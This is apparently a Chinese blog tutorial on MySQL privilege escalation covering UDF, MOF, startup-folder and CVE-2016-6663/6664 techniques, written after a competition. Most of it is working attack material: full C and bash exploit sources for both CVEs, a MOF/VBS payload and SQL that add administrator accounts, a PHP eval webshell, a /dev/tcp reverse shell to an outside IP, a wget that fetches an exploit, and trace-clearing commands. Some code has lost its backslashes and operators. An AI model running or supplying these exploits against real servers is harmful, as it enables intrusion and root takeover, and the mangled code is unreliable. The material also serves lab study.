mysql提權(quán)總結(jié)(mysql提權(quán)方式)
前言
前兩天參加了省賽的內(nèi)網(wǎng)滲透,在拿到webshell后發(fā)現(xiàn)是一個(gè)站庫分離,通過信息搜集得到了數(shù)據(jù)庫的賬號密碼,但是是一個(gè)www-data權(quán)限,執(zhí)行不了代理的命令,這時(shí)候就需要提權(quán)到root權(quán)限才能夠執(zhí)行命令,最后還沒有通過udf提權(quán),而是通過/tmp這個(gè)目錄能夠修改權(quán)限,改為777權(quán)限后使用的代理。因?yàn)閘inux打得比較少,我們隊(duì)在這個(gè)地方卡了很久,導(dǎo)致只打到了第一層網(wǎng)絡(luò),第二層內(nèi)網(wǎng)就沒有時(shí)間去打,所以補(bǔ)一下關(guān)于mysql的提權(quán)知識。
UDF提權(quán)
何為UDF
UDF是mysql的一個(gè)拓展接口,UDF(Userdefined function)可翻譯為用戶自定義函數(shù),這個(gè)是用來拓展MYSQL的技術(shù)手段。
使用過MySQL的人都知道,MySQL有很多內(nèi)置函數(shù)提供給使用者,包括字符串函數(shù)、數(shù)值函數(shù)、日期和時(shí)間函數(shù)等,給開發(fā)人員和使用者帶來了很多方便。MySQL的內(nèi)置函數(shù)雖然豐富,但畢竟不能滿足所有人的需要,有時(shí)候我們需要對表中的數(shù)據(jù)進(jìn)行一些處理而內(nèi)置函數(shù)不能滿足需要的時(shí)候,就需要對MySQL進(jìn)行一些擴(kuò)展,幸運(yùn)的是,MySQL給使用者提供了添加新函數(shù)的機(jī)制,這種使用者自行添加的MySQL函數(shù)就稱為UDF(User Define Function)。其實(shí)除了UDF外,使用者還可以將函數(shù)添加為MySQL的固有(內(nèi)建)函數(shù),固有函數(shù)被編譯進(jìn)mysqld服務(wù)器中,稱為永久可用的,不過這種方式較添加UDF復(fù)雜,升級維護(hù)都較為麻煩,這里我們不做討論。無論你使用哪種方法去添加新函數(shù),它們都可以被SQL聲明調(diào)用,就像 ABS()或SUM()這樣的固有函數(shù)一樣。
UDF利用條件
1.知道數(shù)據(jù)庫的用戶和密碼;2.mysql可以遠(yuǎn)程登錄;3.mysql有寫入文件的權(quán)限,即secure_file_priv的值為空。
關(guān)于第一點(diǎn)就不用多說了,可以通過拿到webshell之后翻閱文件得到,對于不同情況下有不同得獲取方式,這里不再贅述;主要提一下第二三點(diǎn)。
在默認(rèn)情況下,mysql只允許本地登錄,我們知道可以通過navicat去連接數(shù)據(jù)庫(在知道帳號密碼的情況下),但是如果只允許本地登錄的情況下,即使知道賬號密碼的情況下也不能夠連接上mysql數(shù)據(jù)庫,那么在這種情況下就只有通過拿到本機(jī)的高權(quán)限rdp登陸遠(yuǎn)程桌面后連接。
遠(yuǎn)程連接對應(yīng)的設(shè)置在mysql目錄下的/etc/mysql/my.conf文件,對應(yīng)的設(shè)置為bind-address = 127.0.0.1這一行,這是默認(rèn)情況下的設(shè)置,如果我們要允許在任何主機(jī)上面都能夠遠(yuǎn)程登錄mysql的話,就只要把bind-address改成0.0.0.0即可,即bind-address = 0.0.0.0
光更改配置文件還不夠,還需要給遠(yuǎn)程登陸的用戶賦予權(quán)限,首先新建一個(gè)admin/123456用戶,使用%來允許任意ip登錄mysql,這樣我們就能夠通過navicat使用admin/123456用戶遠(yuǎn)程連接到數(shù)據(jù)庫
grant all on *.* to admin@'%' identified by '123456' with grant option;flush privileges;
關(guān)于第三點(diǎn)的secure_file_priv參數(shù),這里有三個(gè)值,分別為NULL、/tmp、空,NULL顧名思義即不允許導(dǎo)入或?qū)С觯敲丛谶@種情況下就不能使用sql語句向數(shù)據(jù)庫內(nèi)寫入任何語句,/tmp的意思是只能在/tmp目錄下寫入文件,這種情況下就需要考慮寫入文件到文件夾后能否在網(wǎng)頁上訪問連接到這個(gè)目錄,如果這個(gè)值為空,那么就可以通過構(gòu)造sql語句向mysql數(shù)據(jù)庫下的任何目錄寫入文件。
這里還有一個(gè)需要了解的點(diǎn)就是在mysql5.5版本之前secure_file_priv這個(gè)值是默認(rèn)為空的,那么我們拿到的webshell如果對應(yīng)的mysql數(shù)據(jù)庫版本在5.5以下的話操作起來就比較方便,在mysql5.5版本之后secure_file_priv這個(gè)值是默認(rèn)為NULL的,即不能夠往數(shù)據(jù)庫內(nèi)寫入文件。
手動(dòng)提權(quán)
首先這里現(xiàn)在官網(wǎng)下載一個(gè)mysql,這里我下載的是5.5.19,注意這里需要下msi文件,不要下zip文件
下載好后進(jìn)行安裝即可
這里使用utf-8字符集
安裝好后使用mysql -u root -p進(jìn)入mysql
因?yàn)槲沂?.5.19版本,必須把 UDF 的動(dòng)態(tài)鏈接庫文件放置于 MySQL 安裝目錄下的 libplugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。這里說到了動(dòng)態(tài)鏈接庫,動(dòng)態(tài)鏈接庫就是實(shí)現(xiàn)共享函數(shù)庫概念的一種方式,在windows環(huán)境下后綴名為.dll,在linnux環(huán)境下后綴名為.so
那么這里利用.dll或.so文件在哪里去找呢?這兩個(gè)文件在sqlmap和msf里面都有內(nèi)置
首先在sqlmap里面找一下,在sqlmap里面對應(yīng)的目錄地址為udf/mysql,這里進(jìn)入目錄后可以看到sqlmap已經(jīng)幫我們分好類了
不過 sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫為了防止被誤殺都經(jīng)過編碼處理過,不能被直接使用。這里如果后綴名為.so_或dll_的話,就需要解碼,如果后綴名為.so或.dll的話就不需要解碼即可直接使用。這里sqlmap也自帶了解碼的py腳本,在/extra/cloak目錄下,使用cloak.py解密即可。
命令如下(這里使用到64位的dll,其他版本改后綴名即可)
python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
這里好像因?yàn)槲冶緳C(jī)的環(huán)境配置的問題這里py3沒有執(zhí)行成功,這里換到kali環(huán)境里面使用py2解密
python2 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll
另外可以用msf提供的動(dòng)態(tài)鏈接庫文件,這里注意msf里面的動(dòng)態(tài)鏈接庫是已經(jīng)解密好了的可以直接使用,msf下的動(dòng)態(tài)鏈接庫目錄如下
/usr/share/metasploit-framework/data/exploits/mysql/
直接拿出來使用010 editor進(jìn)行查看是包含了一些函數(shù)
解密過程完成之后就需要把解密得到的UDF動(dòng)態(tài)鏈接庫文件放到mysql的插件目錄下,這里使用如下命令查詢插件目錄的位置
show variables like "%plugin%";
這里可以看到我的插件目錄就是C:Program FilesMySQLMySQL Server 5.5lib/plugin
使用select @@basedir查看一下MySQL安裝的位置
這里因?yàn)橹粏为?dú)安裝了一個(gè)MySQL,沒有安裝其他的web,所以為了更好的還原環(huán)境,這里使用phpstudy來搭建環(huán)境,這里假設(shè)我已經(jīng)拿到了一個(gè)目標(biāo)機(jī)器的webshell,但是這里權(quán)限很低,使用到udf提權(quán)
首先來到MySQL/lib文件夾下,這里可以看到是沒有plugin這個(gè)文件夾的,所以這里需要我們先創(chuàng)建一個(gè)文件夾
創(chuàng)建plugin文件夾
然后把解密過后的lib_mysqludf_sys_64.dll放到plugin文件夾下
這里為了方便我把dll改名為udf.dll,但是這里報(bào)錯(cuò)ERROR 1126,這里我百度過后發(fā)現(xiàn)這個(gè)dll并不是跟系統(tǒng)位數(shù)有關(guān)的,而是跟mysql版本有關(guān)系,而且phpstudy自帶的mysql版本需要用32位的dll才能夠操作
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
這里我上傳一個(gè)32位的dll到plugin文件夾內(nèi)
再使用命令創(chuàng)建自定義函數(shù)即可
然后使用命令查看是否新增了sys_eval函數(shù)
select * from mysql.func;
可以看到這里創(chuàng)建成功那么就可以執(zhí)行系統(tǒng)命令,到這里就是一個(gè)高權(quán)限了,而且如果有disable_functions把函數(shù)禁用了,用udf提權(quán)也是能夠操作的
拓展:UDF shell
允許外連
這里可以使用寫好的大馬udf.php來自動(dòng)提權(quán),我們測試一下
首先把php上傳到可以網(wǎng)頁訪問的位置,這里我直接連接報(bào)錯(cuò)了應(yīng)該是因?yàn)闆]有設(shè)置可以外連,只允許本地連接,首先實(shí)驗(yàn)一下允許外聯(lián)的情況
這里進(jìn)入my.ini文件設(shè)置bind-address = 0.0.0.0
然后創(chuàng)建一個(gè)admin/123456用戶允許外連
再次登錄即可登錄成功
這里首先dump udf.dll到plugin文件夾下,這里可以看到dump dll成功
然后創(chuàng)建函數(shù),再執(zhí)行命令即可
不允許外連
這里我們再把bind-address = 0.0.0.0這行注釋掉之后進(jìn)行試驗(yàn),因?yàn)椴辉试S外連,那么只有本地連接數(shù)據(jù)庫,這時(shí)候很容易想到正向連接我們代理進(jìn)去連接數(shù)據(jù)庫。這里使用reg、ew都可以,但是這里因?yàn)槭莔ysql的原因,使用navicat自帶的tunnel腳本會(huì)更加方便。
首先測試一下,是不允許外連的(這里圖搞錯(cuò)了)
這里上傳nutunnel_mysql.php到靶機(jī)上訪問,這里看到已經(jīng)連接成功了
然后連接的時(shí)候設(shè)置HTTP隧道
即可連接到mysql,然后提權(quán)操作同前
MOF提權(quán)
mof是windows系統(tǒng)的一個(gè)文件(在c:/windows/System32/wbem/mof/nullevt.mof)叫做"托管對象格式"其作用是每隔五秒就會(huì)去監(jiān)控進(jìn)程創(chuàng)建和死亡。其就是用又了mysql的root權(quán)限了以后,然后使用root權(quán)限去執(zhí)行我們上傳的mof。隔了一定時(shí)間以后這個(gè)mof就會(huì)被執(zhí)行,這個(gè)mof當(dāng)中有一段是vbs腳本,這個(gè)vbs大多數(shù)的是cmd的添加管理員用戶的命令。
利用條件
- 只使用于windows系統(tǒng),一般低版本系統(tǒng)才可以用,比如xp、server2003
- 對C:WindowsSystem32wbemMOF目錄有讀寫權(quán)限
- 可以找到一個(gè)可寫目錄,寫入mof文件
手動(dòng)提權(quán)
這里我沒有安裝2003的虛擬機(jī),所以就不放圖了,寫一下提權(quán)的步驟
生成testmod.mod文件并上傳到靶機(jī)的可寫目錄
#pragma namespace(".rootsubscription") instance of __EventFilter as $EventFilter { EventNamespace = "RootCimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa "Win32_LocalTime" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject("WScript.Shell")nWSH.run("net.exe user test test123 /add")nWSH.run("net.exe localgroup administrators test /add")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
進(jìn)入mysql命令行執(zhí)行導(dǎo)入命令,導(dǎo)入完成過后系統(tǒng)會(huì)自動(dòng)運(yùn)行
select load_file("nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
使用net user命令即可發(fā)現(xiàn)已經(jīng)加入了管理員組
msf提權(quán)
msf內(nèi)置了MOF提權(quán)模塊,相比于手動(dòng)提權(quán)的好處就是msf的MOF模塊有自動(dòng)清理痕跡的功能
use exploit/windows/mysql/mysql_mofset payload windows/meterpreter/reverse_tcpset rhosts 192.168.10.17set username rootset password rootrun
拓展
因?yàn)槊扛魩追昼姇r(shí)間又會(huì)重新執(zhí)行添加用戶的命令,所以想要清理痕跡得先暫時(shí)關(guān)閉 winmgmt 服務(wù)再刪除相關(guān) mof 文件,這個(gè)時(shí)候再刪除用戶才會(huì)有效果
# 停止 winmgmt 服務(wù)net stop winmgmt# 刪除 Repository 文件夾rmdir /s /q C:Windowssystem32wbemRepository# 手動(dòng)刪除 mof 文件del C:Windowssystem32wbemmofgoodtest.mof /F /S# 刪除創(chuàng)建的用戶net user hacker /delete# 重新啟動(dòng)服務(wù)net start winmgmt
啟動(dòng)項(xiàng)提權(quán)
windows開機(jī)時(shí)候都會(huì)有一些開機(jī)啟動(dòng)的程序,那時(shí)候啟動(dòng)的程序權(quán)限都是system,因?yàn)槭莝ystem把他們啟動(dòng)的,利用這點(diǎn),我們可以將自動(dòng)化腳本寫入啟動(dòng)項(xiàng),達(dá)到提權(quán)的目的。當(dāng) Windows 的啟動(dòng)項(xiàng)可以被 MySQL 寫入的時(shí)候可以使用 MySQL 將自定義腳本導(dǎo)入到啟動(dòng)項(xiàng)中,這個(gè)腳本會(huì)在用戶登錄、開機(jī)、關(guān)機(jī)的時(shí)候自動(dòng)運(yùn)行。
這個(gè)地方既然碰到了啟動(dòng)項(xiàng)提權(quán),就總結(jié)一下不限于mysql的啟動(dòng)項(xiàng)提權(quán)方法。
啟動(dòng)項(xiàng)路徑
在windows2003的系統(tǒng)下,啟動(dòng)項(xiàng)路徑如下:
C:Documents and SettingsAdministrator「開始」菜單程序啟動(dòng)C:Documents and SettingsAll Users「開始」菜單程序啟動(dòng)
在windows2008的系統(tǒng)下,啟動(dòng)項(xiàng)路徑如下:
C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupC:ProgramDataMicrosoftWindowsStart MenuProgramsStartup
自動(dòng)化腳本
我們在拿到一個(gè)網(wǎng)站的webshell的時(shí)候如果想進(jìn)一步的獲得網(wǎng)站的服務(wù)器權(quán)限,查看服務(wù)器上系統(tǒng)盤的可讀可寫目錄,若是啟動(dòng)目錄 “C:Users用戶名AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup” 是可讀可寫的,我們就可以執(zhí)行上傳一個(gè)vbs或者bat的腳本進(jìn)行提權(quán)。
這里使用test.vbs添加用戶密碼,上傳到啟動(dòng)目錄重啟的時(shí)候即可自動(dòng)添加賬號密碼
set wshshell=createobject("wscript.shell")a=wshshell.run("cmd.exe /c net user test test123 /add",0)b=wshshell.run("cmd.exe /c net localgroup administrators test /add",0)
使用sql語句
連接到mysql之后創(chuàng)建一個(gè)表寫入sql語句
use mysql;create table test(cmd text);insert into a values(“set wshshell=createobject(“”wscript.shell””)”);insert into a values(“a=wshshell.run(“”cmd.exe /c net user test test123 /add“”,0)”);insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators test /add“”,0)”);select * from a into outfile “C:Documents and SettingsAll Users「開始」菜單程序啟動(dòng)secist.vbs”;
重啟之后即可提權(quán)
cve-2016-6663&CVE-2016-6664
CVE-2016-6663是競爭條件(race condition)漏洞,它能夠讓一個(gè)低權(quán)限賬號(擁有CREATE/INSERT/SELECT權(quán)限)提升權(quán)限并且以系統(tǒng)用戶身份執(zhí)行任意代碼。也就是說,我們可以通過他得到一整個(gè)mysql的權(quán)限。
CVE-2016-6664是root權(quán)限提升漏洞,這個(gè)漏洞可以讓擁有MySQL系統(tǒng)用戶權(quán)限的攻擊者提升權(quán)限至root,以便進(jìn)一步攻擊整個(gè)系統(tǒng)。
導(dǎo)致這個(gè)問題的原因其實(shí)是因?yàn)镸ySQL對錯(cuò)誤日志以及其他文件的處理不夠安全,這些文件可以被替換成任意的系統(tǒng)文件,從而被利用來獲取root權(quán)限。可以看到,兩個(gè)cve分別是用來將低權(quán)限的www-data權(quán)限提升為mysql權(quán)限,然后再將mysql提升為root權(quán)限。
利用條件
CVE-2016-6663
- 1.已經(jīng)getshell,獲得www-data權(quán)限
- 2.獲取到一個(gè)擁有create,drop,insert,select權(quán)限的數(shù)據(jù)庫賬號,密碼
- 3.提權(quán)過程需要在交互式的shell環(huán)境中運(yùn)行,所以需要反彈shell再提權(quán)
- 4.Mysql<5.5.51或<5.6.32或<5.7.14
CVE-2016-6664
- 1.目標(biāo)主機(jī)配置必須是是基于文件的日志(默認(rèn)配置),也就是不能是syslog方式(通過cat /etc/mysql/conf.d/mysqld_safe_syslog.cnf查看沒有包含“syslog”字樣即可)
- 2.需要在mysql權(quán)限下運(yùn)行才能利用
- 3.Mysql<5.5.51或<5.6.32或<5.7.14
環(huán)境搭建
這里使用到tutum/lamp的鏡像環(huán)境,運(yùn)行docker并連接
docker pull tutum/lampdocker run -d -P tutum/lampdocker psdocker exec -it b9 /bin/bash
安裝apt,wget,gcc,libmysqlclient-dev
apt updateapt install -y wget gcc libmysqlclient-dev
寫入一個(gè)一句話木馬方便后續(xù)連接,這里注意,linux環(huán)境下用echo命令寫入木馬需要加' '進(jìn)行轉(zhuǎn)義,否則會(huì)報(bào)錯(cuò)
cd /var/htmlecho '<?php @eval($_POST['hacker']); ?>' > shell.php
給web路徑賦予777權(quán)限
chmod -R 777 /var/www/html
進(jìn)入mysql環(huán)境添加一個(gè)對test庫有create,drop,insert,select權(quán)限的test用戶,密碼為123456
將apache2和mysql服務(wù)重啟并重新保存容器,將新容器的80端口映射到8080端口,3306映射到3306端口的方式運(yùn)行容器。
service restart apache2service restart mysqlocker commit c0ae81326db0 test/lampdocker run -d -p 8080:80 -p 3306:3306 test/lamp
訪問一下8080端口若出現(xiàn)如下界面則環(huán)境搭建成功
CVE-2016-6663
cve-2016-6663即將www-data權(quán)限提升為mysql權(quán)限,首先連接我們之前寫入的webshell
首先看一下權(quán)限跟目錄的可執(zhí)行狀況,可以看到html目錄下是777
然后寫入exp,命名為mysql-privesc-race.c,exp如下所示
#include <fcntl.h>#include <grp.h>#include <mysql.h>#include <pwd.h>#include <stdint.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/inotify.h>#include <sys/stat.h>#include <sys/types.h>#include <sys/wait.h>#include <time.h>#include <unistd.h>#define EXP_PATH "/tmp/mysql_privesc_exploit"#define EXP_DIRN "mysql_privesc_exploit"#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD"#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessaryMYSQL *conn; // DB handlesMYSQL_RES *res;MYSQL_ROW row;unsigned long cnt;void intro() {printf( "033[94mn" "MySQL/Percona/MariaDB - Privilege Escalation / Race Condition PoC Exploitn" "mysql-privesc-race.c (ver. 1.0)nn" "CVE-2016-6663 / CVE-2016-5616nn" "For testing purposes only. Do no harm.nn" "Discovered/Coded by:nn" "Dawid Golunski n" "http://legalhackers.com" "033[0mnn");}void usage(char *argv0) { intro(); printf("Usage:nn%s user pass db_host databasenn", argv0);}void mysql_cmd(char *sql_cmd, int silent) { if (!silent) { printf("%s n", sql_cmd); } if (mysql_query(conn, sql_cmd)) { fprintf(stderr, "%sn", mysql_error(conn)); exit(1); } res = mysql_store_result(conn); if (res>0) mysql_free_result(res);}int main(int argc,char **argv){ int randomnum = 0; int io_notified = 0; int myd_handle; int wpid; int is_shell_suid=0; pid_t pid; int status; struct stat st; /* io notify */ int fd; int ret; char buf[4096] __attribute__((aligned(8))); int num_read; struct inotify_event *event; /* credentials */ char *user = argv[1]; char *password = argv[2]; char *db_host = argv[3]; char *database = argv[4]; // Disable buffering of stdout setvbuf(stdout, NULL, _IONBF, 0); // Get the params if (argc!=5) { usage(argv[0]); exit(1); } intro(); // Show initial privileges printf("n[ ] Starting the exploit as: n"); system("id"); // Connect to the database server with provided credentials printf("n[ ] Connecting to the database `%s` as %s@%sn", database, user, db_host); conn = mysql_init(NULL); if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { fprintf(stderr, "%sn", mysql_error(conn)); exit(1); } // Prepare tmp dir printf("n[ ] Creating exploit temp directory %sn", "/tmp/" EXP_DIRN); umask(000); system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); system("chmod g s /tmp/" EXP_DIRN ); // Prepare exploit tables :) printf("n[ ] Creating mysql tables nn"); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory printf("n[ ] Copying bash into the mysql_suid_shell table.n After the exploitation the following file/table will be assigned SUID and executable bits : n"); system("cp /bin/bash " SUID_SHELL); system("ls -l " SUID_SHELL); // Use inotify to get the timing right fd = inotify_init(); if (fd < 0) { printf("failed to inotify_initn"); return -1; } ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID exec perms */ printf("n[ ] Entering the race loop... Hang in there...n"); while ( is_shell_suid != 1 ) { cnt ; if ( (cnt % 100) == 0 ) { printf("->"); //fflush(stdout); } /* Create empty file , remove if already exists */ unlink(MYSQL_TEMP_FILE); unlink(MYSQL_TAB_FILE); mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); /* random num if needed */ srand ( time(NULL) ); randomnum = ( rand() % MAX_DELAY ); // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink pid = fork(); if (pid < 0) { fprintf(stderr, "Fork failed :(n"); } /* Child process - executes REPAIR TABLE SQL statement */ if (pid == 0) { usleep(500); unlink(MYSQL_TEMP_FILE); mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); // child stops here exit(0); } /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ if (pid > 0 ) { io_notified = 0; while (1) { int processed = 0; ret = read(fd, buf, sizeof(buf)); if (ret < 0) { break; } while (processed < ret) { event = (struct inotify_event *)(buf processed); if (event->mask & IN_CLOSE) { if (!strcmp(event->name, "exploit_table.TMD")) { //usleep(randomnum); // Set the .MYD permissions to suid exec before they get copied to the .TMD file unlink(MYSQL_TAB_FILE); myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); close(myd_handle); chmod(MYSQL_TAB_FILE, 04777); // Replace the temp .TMD file with a symlink to the target sh binary to get suid exec unlink(MYSQL_TEMP_FILE); symlink(SUID_SHELL, MYSQL_TEMP_FILE); io_notified=1; } } processed = sizeof(struct inotify_event); } if (io_notified) { break; } } waitpid(pid, &status, 0); } // Check if SUID bit was set at the end of this attempt if ( lstat(SUID_SHELL, &st) == 0 ) { if (st.st_mode & S_ISUID) { is_shell_suid = 1; } } } printf("nn[ ] 033[94mBingo! Race won (took %lu tries) !033[0m Check out the 033[94mmysql SUID shell033[0m: nn", cnt); system("ls -l " SUID_SHELL); printf("n[ ] Spawning the 033[94mmysql SUID shell033[0m now... n Remember that from there you can gain 033[1;31mroot033[0m with vuln 033[1;31mCVE-2016-6662033[0m or 033[1;31mCVE-2016-6664033[0m :)nn"); system(SUID_SHELL " -p -i "); //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); /* close MySQL connection and exit */ printf("n[ ] Job done. Exitingnn"); mysql_close(conn); return 0;}
這里我直接用蟻劍執(zhí)行的話執(zhí)行不了
使用nc配合bash命令反彈后執(zhí)行命令,即可從www-data權(quán)限提升到mysql權(quán)限
nc -lvvp 7777/bin/bash -i >& /dev/tcp/192.168.2.161/7777 0>&1cd var/www/html/gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient./mysql-privesc-race test 123456 localhost test
CVE-2016-6664
cve-2016-6664即把mysql權(quán)限提升到root權(quán)限
tutum/lamp日志方式不是默認(rèn)的基于文件的日志,而是syslog,所以我們首先要將它改為默認(rèn)配置
vi /etc/mysql/conf.d/mysqld_safe_syslog.cnf
刪除掉syslog,然后重啟mysql
使用exp
#!/bin/bash -p## MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit# mysql-chowned.sh (ver. 1.0)## CVE-2016-6664 / OCVE-2016-5617## Discovered and coded by:## Dawid Golunski# dawid[at]legalhackers.com## https://legalhackers.com## Follow https://twitter.com/dawid_golunski for updates on this advisory.## This PoC exploit allows attackers to (instantly) escalate their privileges# from mysql system account to root through unsafe error log handling.# The exploit requires that file-based logging has been configured (default).# To confirm that syslog logging has not been enabled instead use:# grep -r syslog /etc/mysql# which should return no results.## This exploit can be chained with the following vulnerability:# CVE-2016-6663 / OCVE-2016-5616# which allows attackers to gain access to mysql system account (mysql shell).## In case database server has been configured with syslog you may also use:# CVE-2016-6662 as an alternative to this exploit.## Usage:# ./mysql-chowned.sh path_to_error.log ### See the full advisory for details at:# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html## Video PoC:# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html## Disclaimer:# For testing purposes only. Do no harm.#BACKDOORSH="/bin/bash"BACKDOORPATH="/tmp/mysqlrootsh"PRIVESCLIB="/tmp/privesclib.so"PRIVESCSRC="/tmp/privesclib.c"SUIDBIN="/usr/bin/sudo"function cleanexit { # Cleanup echo -e "n[ ] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "n[ ] Job done. Exiting with code $1 n" exit $1}function ctrl_c() { echo -e "n[ ] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." cleanexit 0}#intro echo -e "033[94m nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit nmysql-chowned.sh (ver. 1.0)nnCVE-2016-6664 / OCVE-2016-5617n"echo -e "Discovered and coded by: nnDawid Golunski nhttp://legalhackers.com 033[0m"# Argsif [ $# -lt 1 ]; then echo -e "n[!] Exploit usage: nn$0 path_to_error.log n" echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`n" exit 3fi# Priv checkecho -e "n[ ] Starting the exploit as n033[94m`id`033[0m"id | grep -q mysql if [ $? -ne 0 ]; then echo -e "n[!] You need to execute the exploit as mysql user! Exiting.n" exit 3fi# Set target pathsERRORLOG="$1"if [ ! -f $ERRORLOG ]; then echo -e "n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.n" exit 3fiecho -e "n[ ] Target MySQL log file set to $ERRORLOG"# [ Active exploitation ]trap ctrl_c INT# Compile privesc preload libraryecho -e "n[ ] Compiling the privesc shared library ($PRIVESCSRC)"cat <<_solibeof_>$PRIVESCSRC#define _GNU_SOURCE#include <stdio.h>#include <sys/stat.h>#include <unistd.h>#include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h>uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); //unlink("/etc/ld.so.preload"); } return old_geteuid();}_solibeof_/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"if [ $? -ne 0 ]; then echo -e "n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2;fi# Prepare backdoor shellcp $BACKDOORSH $BACKDOORPATHecho -e "n[ ] Backdoor/low-priv shell installed at: n`ls -l $BACKDOORPATH`"# Safety checkif [ -f /etc/ld.so.preload ]; then echo -e "n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2fi# Symlink the log file to /etcrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOGif [ $? -ne 0 ]; then echo -e "n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3fiecho -e "n[ ] Symlink created at: n`ls -l $ERRORLOG`"# Wait for MySQL to re-open the logsecho -ne "n[ ] Waiting for MySQL to re-open the logs/MySQL service restart...n"read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWERif [ "$THE_ANSWER" = "y" ]; then echo -e "Got it. Executing 'killall mysqld' now..." killall mysqldfiwhile :; do sleep 0.1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fidone# /etc/ dir should be owned by mysql user at this point# Inject the privesc.so shared library to escalate privilegesecho $PRIVESCLIB > /etc/ld.so.preloadecho -e "n[ ] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: n`ls -l /etc/ld.so.preload`"echo -e "n[ ] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"echo -e "n[ ] The /etc/ld.so.preload file now contains: n`cat /etc/ld.so.preload`"chmod 755 /etc/ld.so.preload# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)echo -e "n[ ] Escalating privileges via the $SUIDBIN SUID binary to get root!"sudo 2>/dev/null >/dev/null#while :; do # sleep 0.1# ps aux | grep mysqld | grep -q 'log-error'# if [ $? -eq 0 ]; then# break;# fi#done# Check for the rootshellls -l $BACKDOORPATHls -l $BACKDOORPATH | grep rws | grep -q rootif [ $? -eq 0 ]; then echo -e "n[ ] Rootshell got assigned root SUID perms at: n`ls -l $BACKDOORPATH`" echo -e "n033[94mGot root! The database server has been ch-OWNED !033[0m"else echo -e "n[!] Failed to get root" cleanexit 2fi# Execute the rootshellecho -e "n[ ] Spawning the rootshell $BACKDOORPATH now! n"$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"$BACKDOORPATH -p# Job done.cleanexit 0
在剛才mysql權(quán)限的shell中下載提權(quán)腳本并執(zhí)行,即可得到root權(quán)限
wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.shchmod 777 mysql-chowned.sh./mysql-chowned.sh /var/log/mysql/error.log
點(diǎn)擊鏈接開始實(shí)驗(yàn):實(shí)驗(yàn):MySQL提權(quán)(合天網(wǎng)安實(shí)驗(yàn)室)
